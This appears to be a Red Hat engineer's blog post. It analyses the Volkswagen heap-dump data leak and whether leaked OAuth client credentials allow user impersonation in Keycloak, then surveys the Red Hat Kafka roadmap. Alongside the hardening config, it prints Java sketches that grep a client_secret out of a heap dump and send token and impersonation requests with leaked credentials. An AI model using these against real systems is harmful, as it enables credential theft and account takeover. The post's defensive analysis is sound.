Things to add to CW1 2025 - Volkswagen data leak @38c3 2024 - Quarkus, Connectivity Link, ACS
Again, here is the recording from 38c3 (in German).
A Red Hat colleague pointed out to me that, in addition to the heap dump, there was a second factor in the Volkswagen data leak: the identity provider.
We don't know exactly which identity provider was used, so we took the scenario and checked whether the same attack would also work against our product Keycloak.
As a reminder: the leak happened because the developers of the Spring software left the Spring Boot Actuator, and in particular the endpoint /actuator/heapdump, enabled in production. This allowed the CCC researchers to pull heap dumps and analyze the data they contained.
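Incidentally, recent Spring Boot versions expose only the health endpoint over HTTP by default, so heapdump must have been opted into explicitly. Besides trimming the exposure list, the actuator can also be put behind authentication; here is a minimal Spring Security sketch (the role name and the basic-auth choice are my assumptions, not anything we know about the Volkswagen setup):

```java
import org.springframework.boot.actuate.autoconfigure.security.servlet.EndpointRequest;
import org.springframework.boot.actuate.health.HealthEndpoint;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.security.config.Customizer;
import org.springframework.security.config.annotation.web.builders.HttpSecurity;
import org.springframework.security.web.SecurityFilterChain;

@Configuration
public class ActuatorSecurityConfig {

    // Restrict all actuator endpoints (including /actuator/heapdump) to an
    // operations role; only the health probe stays publicly reachable.
    @Bean
    SecurityFilterChain actuatorChain(HttpSecurity http) throws Exception {
        http.securityMatcher(EndpointRequest.toAnyEndpoint())
            .authorizeHttpRequests(auth -> auth
                .requestMatchers(EndpointRequest.to(HealthEndpoint.class)).permitAll()
                .anyRequest().hasRole("OPS"))
            .httpBasic(Customizer.withDefaults());
        return http.build();
    }
}
```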
In the heap dump they found a client_id and client_secret used for OAuth2 authentication, carried out a token exchange, and were able to impersonate the user.
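To get a feeling for how little tooling this step requires: conceptually the analysis boils down to `strings heapdump.hprof | grep client_secret`. Here is a deliberately crude Java sketch of that idea; a real analysis would use a proper heap-dump tool such as Eclipse MAT or VisualVM:

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;

public class HeapDumpGrep {
    public static void main(String[] args) throws IOException {
        // Sketch only: loading a multi-gigabyte dump into memory like this
        // would not fly in practice, but it keeps the idea visible.
        byte[] dump = Files.readAllBytes(Path.of("heapdump.hprof"));
        byte[] needle = "client_secret".getBytes();

        // Scan the raw bytes for the marker and print the surrounding window,
        // which in an .hprof file often contains the secret itself.
        for (int i = 0; i <= dump.length - needle.length; i++) {
            int j = 0;
            while (j < needle.length && dump[i + j] == needle[j]) j++;
            if (j == needle.length) {
                int end = Math.min(dump.length, i + 120);
                System.out.println(new String(dump, i, end - i).replaceAll("\\P{Print}", "."));
            }
        }
    }
}
```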
So our question was: Is it possible to log into a system as a user if you have a client ID and client secret?
Roughly speaking, this means using the leaked credentials to have a valid token issued, so that you can then do everything in the system that the user is allowed to do.
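To make that concrete, here is a minimal sketch of the first step against a Keycloak-style token endpoint (host, realm, and credentials are placeholders). The client credentials grant already yields a valid token from the leaked secret alone, although only with the client's own permissions, not yet a user's:

```java
import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;

public class ClientCredentialsDemo {
    public static void main(String[] args) throws Exception {
        // Placeholder Keycloak token endpoint.
        String tokenUrl = "https://sso.example.com/realms/demo/protocol/openid-connect/token";

        // Client credentials grant: the leaked client_id/client_secret are
        // enough to obtain a token, but it carries the client's permissions.
        String form = "grant_type=client_credentials"
                + "&client_id=leaked-client"
                + "&client_secret=leaked-secret";

        HttpRequest request = HttpRequest.newBuilder()
                .uri(URI.create(tokenUrl))
                .header("Content-Type", "application/x-www-form-urlencoded")
                .POST(HttpRequest.BodyPublishers.ofString(form))
                .build();

        HttpResponse<String> response = HttpClient.newHttpClient()
                .send(request, HttpResponse.BodyHandlers.ofString());
        System.out.println(response.body()); // JSON with an access_token on success
    }
}
```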
Keycloak (and also the OAuth standard, in the form of OAuth 2.0 Token Exchange, RFC 8693) has the Impersonate function, which you can use to issue user tokens. Link to documentation
However, this requires that the client has been explicitly granted the corresponding permission, which has to be assigned manually. The documentation warns against exactly this kind of setup and points out the associated dangers.
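For completeness, here is what such an impersonation attempt looks like on the wire. Keycloak implements it via the token exchange grant; sending requested_subject without a subject_token is what its documentation calls direct naked impersonation. All names below are placeholders, and the request is rejected unless the permission described above has been granted:

```java
import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;

public class ImpersonationProbe {
    public static void main(String[] args) throws Exception {
        // Placeholder Keycloak token endpoint.
        String tokenUrl = "https://sso.example.com/realms/demo/protocol/openid-connect/token";

        // Token exchange grant (RFC 8693): requesting a token *for another
        // subject*. Keycloak only honors this if the client was explicitly
        // granted the impersonation permission by an administrator.
        String form = "grant_type=urn:ietf:params:oauth:grant-type:token-exchange"
                + "&client_id=leaked-client"
                + "&client_secret=leaked-secret"
                + "&requested_subject=victim-user";

        HttpResponse<String> response = HttpClient.newHttpClient().send(
                HttpRequest.newBuilder()
                        .uri(URI.create(tokenUrl))
                        .header("Content-Type", "application/x-www-form-urlencoded")
                        .POST(HttpRequest.BodyPublishers.ofString(form))
                        .build(),
                HttpResponse.BodyHandlers.ofString());

        // On success the body contains an access_token issued for victim-user.
        System.out.println(response.statusCode() + " " + response.body());
    }
}
```

In other words: in Keycloak, leaked client credentials alone are not enough; an administrator must first have assigned exactly the permission the documentation warns about.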
My colleague points out that there are legacy applications that require this impersonation feature. That is not a topic I want to delve deeper into here; if it really is the case, you should adapt the legacy applications instead of opening up such a big hole, no matter how long it takes.
Red Hat Kafka
Most recently, I have been fortunate enough to work on an opportunity that involves operating and using Kafka, which led me to look into the roadmap and new developments around Red Hat's Kafka offering (upstream: Strimzi).
The great thing about Red Hat's Kafka offering is that you don't just buy Kafka on its own, you subscribe to a bundle. For the same money (= the core subscription on the OpenShift cluster) you get Kafka plus many other products that you will need anyway if you want real added value.
Worth mentioning here are Debezium, a change data capture (CDC) framework that reacts to database changes, as well as the integration framework Camel and the schema registry Apicurio.
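To make the Debezium part a little more concrete, here is a minimal sketch of its embedded engine watching a hypothetical PostgreSQL database (all connection details are placeholders; in the Red Hat bundle you would more typically deploy Debezium as a Kafka Connect connector next to the Kafka cluster):

```java
import io.debezium.engine.ChangeEvent;
import io.debezium.engine.DebeziumEngine;
import io.debezium.engine.format.Json;

import java.util.Properties;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;

public class DebeziumSketch {
    public static void main(String[] args) {
        // Placeholder connection details for a PostgreSQL source.
        Properties props = new Properties();
        props.setProperty("name", "engine");
        props.setProperty("connector.class", "io.debezium.connector.postgresql.PostgresConnector");
        props.setProperty("database.hostname", "localhost");
        props.setProperty("database.port", "5432");
        props.setProperty("database.user", "postgres");
        props.setProperty("database.password", "secret");
        props.setProperty("database.dbname", "inventory");
        props.setProperty("topic.prefix", "inventory");
        props.setProperty("offset.storage", "org.apache.kafka.connect.storage.FileOffsetBackingStore");
        props.setProperty("offset.storage.file.filename", "/tmp/offsets.dat");

        // Every committed insert/update/delete arrives here as a JSON event.
        DebeziumEngine<ChangeEvent<String, String>> engine = DebeziumEngine.create(Json.class)
                .using(props)
                .notifying(event -> System.out.println(event.value()))
                .build();

        ExecutorService executor = Executors.newSingleThreadExecutor();
        executor.execute(engine);
    }
}
```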
The roadmap highlights for 2025 are:
- ZooKeeper removal and migration to KRaft (= a more lightweight deployment)
- Record encryption (via Kroxylicious, encryption at rest)
- new AMQ Streams console
- Apache Flink (stream and batch processing, more efficient than the Kafka Streams API; see the sketch after this list)
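Since Flink is the item that changes the programming model, here is a minimal sketch of a Flink job consuming from Kafka, assuming the standard Flink Kafka connector (broker, topic, and group names are placeholders):

```java
import org.apache.flink.api.common.eventtime.WatermarkStrategy;
import org.apache.flink.api.common.serialization.SimpleStringSchema;
import org.apache.flink.connector.kafka.source.KafkaSource;
import org.apache.flink.connector.kafka.source.enumerator.initializer.OffsetsInitializer;
import org.apache.flink.streaming.api.environment.StreamExecutionEnvironment;

public class FlinkKafkaSketch {
    public static void main(String[] args) throws Exception {
        StreamExecutionEnvironment env = StreamExecutionEnvironment.getExecutionEnvironment();

        // Placeholder broker and topic names.
        KafkaSource<String> source = KafkaSource.<String>builder()
                .setBootstrapServers("my-cluster-kafka-bootstrap:9092")
                .setTopics("events")
                .setGroupId("flink-sketch")
                .setStartingOffsets(OffsetsInitializer.earliest())
                .setValueOnlyDeserializer(new SimpleStringSchema())
                .build();

        // The topology looks much like a Kafka Streams one, but it runs on
        // the Flink runtime, which covers batch workloads with the same API.
        env.fromSource(source, WatermarkStrategy.noWatermarks(), "kafka-events")
           .map(String::toUpperCase)
           .print();

        env.execute("flink-kafka-sketch");
    }
}
```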
Some of the roadmap highlights are already generally available, but I don’t have time (yet) to dive deeper. It will be exciting.